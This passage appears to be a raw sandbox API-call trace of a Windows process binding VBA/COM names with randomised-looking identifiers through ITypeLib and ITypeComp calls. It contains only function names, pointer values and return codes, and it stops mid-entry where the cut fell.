[0069.746] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_pUA_AX", lHashVal=0x102bdb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.746] IUnknown:Release (This=0x665ba50) returned 0xd [0069.746] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.746] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_pUA_AX", lHashVal=0x102bdb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.746] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.746] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.746] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_pUA_AX", lHashVal=0x102bdb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.746] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.747] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.747] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_pUA_AX", lHashVal=0x102bdb, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.747] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.747] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.747] IUnknown:Release (This=0x665ba50) returned 0xd [0069.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87100e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_pUA_AX") returned 14 [0069.747] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_pUA_AX", lHashVal=0x102bdb, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x41005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x70005f00720061, ppTypeComp=0x41005f00000000, pDummy=0x0) returned 0x0 [0069.747] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81c62 | out: _Dst=0x144ec0) returned 0x0 [0069.747] ITypeComp:RemoteBind (in: This=0x665ba60, szName="uAAQxA", lHashVal=0x10750e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81cb2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="uAAQxA") returned 7 [0069.747] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="uAAQxA", lHashVal=0x10750e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81cb2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="uAAQxA") returned 7 [0069.747] ITypeComp:RemoteBind (in: This=0x665bd30, szName="uAAQxA", lHashVal=0x10750e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.747] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="uAAQxA") returned 0x10750e [0069.747] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="uAAQxA" | out: _Dst="uAAQxA") returned 0x0 [0069.747] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="uAAQxA") returned 7 [0069.747] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.747] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="uAAQxA", lHashVal=0x10750e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.748] IUnknown:Release (This=0x665ba50) returned 0xd [0069.748] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.748] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="uAAQxA", lHashVal=0x10750e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.748] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.748] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.748] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="uAAQxA", lHashVal=0x10750e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.748] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.748] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.748] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="uAAQxA", lHashVal=0x10750e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.748] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81cb2, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="uAAQxA") returned 7 [0069.748] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="uAAQxA", lHashVal=0x10750e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.748] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.748] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81cb2 | out: _Dst=0x67c2d40) returned 0x0 [0069.748] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_uAAQxA") returned 0x10efb7 [0069.748] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_uAAQxA" | out: _Dst="_B_var_uAAQxA") returned 0x0 [0069.748] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_uAAQxA") returned 14 [0069.748] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.748] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_uAAQxA", lHashVal=0x10efb7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.748] IUnknown:Release (This=0x665ba50) returned 0xd [0069.748] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.748] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_uAAQxA", lHashVal=0x10efb7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.748] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.749] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.749] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_uAAQxA", lHashVal=0x10efb7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.749] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.749] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.749] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_uAAQxA", lHashVal=0x10efb7, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.749] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.749] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.749] IUnknown:Release (This=0x665ba50) returned 0xd [0069.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87103e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_uAAQxA") returned 14 [0069.749] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_uAAQxA", lHashVal=0x10efb7, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x78005100000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x75005f00720061, ppTypeComp=0x78005100000000, pDummy=0x0) returned 0x0 [0069.749] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81cb2 | out: _Dst=0x144ec0) returned 0x0 [0069.749] ITypeComp:RemoteBind (in: This=0x665ba60, szName="jACkAB", lHashVal=0x10e38e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81cda, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jACkAB") returned 7 [0069.749] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="jACkAB", lHashVal=0x10e38e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81cda, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jACkAB") returned 7 [0069.749] ITypeComp:RemoteBind (in: This=0x665bd30, szName="jACkAB", lHashVal=0x10e38e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.749] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="jACkAB") returned 0x10e38e [0069.749] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="jACkAB" | out: _Dst="jACkAB") returned 0x0 [0069.749] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="jACkAB") returned 7 [0069.749] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.749] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="jACkAB", lHashVal=0x10e38e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.750] IUnknown:Release (This=0x665ba50) returned 0xd [0069.750] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.750] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="jACkAB", lHashVal=0x10e38e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.750] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.750] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.750] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="jACkAB", lHashVal=0x10e38e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.750] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.750] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.750] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="jACkAB", lHashVal=0x10e38e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.750] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.750] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81cda, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="jACkAB") returned 7 [0069.750] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="jACkAB", lHashVal=0x10e38e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.750] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.751] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b81cda | out: _Dst=0x67c2d40) returned 0x0 [0069.751] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_jACkAB") returned 0x105df8 [0069.751] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_jACkAB" | out: _Dst="_B_var_jACkAB") returned 0x0 [0069.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_jACkAB") returned 14 [0069.751] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.751] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_jACkAB", lHashVal=0x105df8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.751] IUnknown:Release (This=0x665ba50) returned 0xd [0069.751] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.751] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_jACkAB", lHashVal=0x105df8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.751] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.751] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.751] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_jACkAB", lHashVal=0x105df8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.751] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.751] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.751] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_jACkAB", lHashVal=0x105df8, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.751] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.751] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.751] IUnknown:Release (This=0x665ba50) returned 0xd [0069.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87106e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_jACkAB") returned 14 [0069.751] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_jACkAB", lHashVal=0x105df8, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41006b00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6a005f00720061, ppTypeComp=0x41006b00000000, pDummy=0x0) returned 0x0 [0069.751] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b81cda | out: _Dst=0x144ec0) returned 0x0 [0069.751] ITypeComp:RemoteBind (in: This=0x665ba60, szName="HQkX_wAA", lHashVal=0x10ffd2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.751] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81d02, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="HQkX_wAA") returned 9 [0069.751] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="HQkX_wAA", lHashVal=0x10ffd2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81d02, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="HQkX_wAA") returned 9 [0069.752] ITypeComp:RemoteBind (in: This=0x665bd30, szName="HQkX_wAA", lHashVal=0x10ffd2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.752] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="HQkX_wAA") returned 0x10ffd2 [0069.752] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="HQkX_wAA" | out: _Dst="HQkX_wAA") returned 0x0 [0069.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="HQkX_wAA") returned 9 [0069.752] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.752] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="HQkX_wAA", lHashVal=0x10ffd2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.752] IUnknown:Release (This=0x665ba50) returned 0xd [0069.752] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.752] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="HQkX_wAA", lHashVal=0x10ffd2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.752] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.752] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.752] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="HQkX_wAA", lHashVal=0x10ffd2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.752] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.752] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.752] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="HQkX_wAA", lHashVal=0x10ffd2, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.752] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81d02, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="HQkX_wAA") returned 9 [0069.752] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="HQkX_wAA", lHashVal=0x10ffd2, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.752] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.752] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b81d02 | out: _Dst=0x67c2d40) returned 0x0 [0069.752] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_HQkX_wAA") returned 0x10c7da [0069.752] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_HQkX_wAA" | out: _Dst="_B_var_HQkX_wAA") returned 0x0 [0069.752] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_HQkX_wAA") returned 16 [0069.752] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.752] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_HQkX_wAA", lHashVal=0x10c7da, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.753] IUnknown:Release (This=0x665ba50) returned 0xd [0069.753] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.753] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_HQkX_wAA", lHashVal=0x10c7da, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.753] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.753] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.753] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_HQkX_wAA", lHashVal=0x10c7da, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.753] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.753] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.753] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_HQkX_wAA", lHashVal=0x10c7da, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.753] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.753] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.753] IUnknown:Release (This=0x665ba50) returned 0xd [0069.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa87109e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_HQkX_wAA") returned 16 [0069.753] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_HQkX_wAA", lHashVal=0x10c7da, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x5f005800000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x48005f00720061, ppTypeComp=0x5f005800000000, pDummy=0x0) returned 0x0 [0069.753] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b81d02 | out: _Dst=0x144ec0) returned 0x0 [0069.753] ITypeComp:RemoteBind (in: This=0x665ba60, szName="zwCQQDw", lHashVal=0x1047ed, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81d56, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="zwCQQDw") returned 8 [0069.753] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="zwCQQDw", lHashVal=0x1047ed, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.753] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b81d56, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="zwCQQDw") returned 8 [0069.753] ITypeComp:RemoteBind (in: This=0x665bd30, szName="zwCQQDw", lHashVal=0x1047ed, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.753] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="zwCQQDw") returned 0x1047ed [0069.753] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="zwCQQDw" | out: _Dst="zwCQQDw") returned 0x0 [0069.754] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="zwCQQDw") returned 8 [0069.754] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.754] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="zwCQQDw", lHashVal=0x1047ed, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.754] IUnknown:Release (This=0x665ba50) returned 0xd [0069.754] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.754] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="zwCQQDw", lHashVal=0x1047ed, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.754] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.754] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.754] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="zwCQQDw", lHashVal=0x1047ed, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.754] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.754] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.754] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="zwCQQDw", lHashVal=0x1047ed, pfName=0x144bc0, 